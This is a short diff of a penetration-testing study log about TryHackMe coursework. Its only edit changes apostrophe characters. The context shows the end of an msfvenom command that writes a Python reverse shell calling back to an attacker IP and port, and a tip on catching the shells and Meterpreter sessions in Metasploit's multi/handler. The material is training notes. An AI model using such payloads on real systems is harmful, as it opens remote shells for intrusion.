cardboard-iguana/cardboard-iguana.com/log/2022-04-14-tryhackme-jr-penetration-tester.md

 LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f raw > rev_shell.py
 ```

-Use the `exploit/multi/handler` module in Metasploit to catch the shells produced using Msfvenom (note that you’ll need to use `set payload` to tell Metasploit *what* it’s catching!).
+Use the `exploit/multi/handler` module in Metasploit to catch the shells produced using Msfvenom (note that you'll need to use `set payload` to tell Metasploit *what* it's catching!).
 We can catch both regular reverse shells and Meterpreter sessions this way.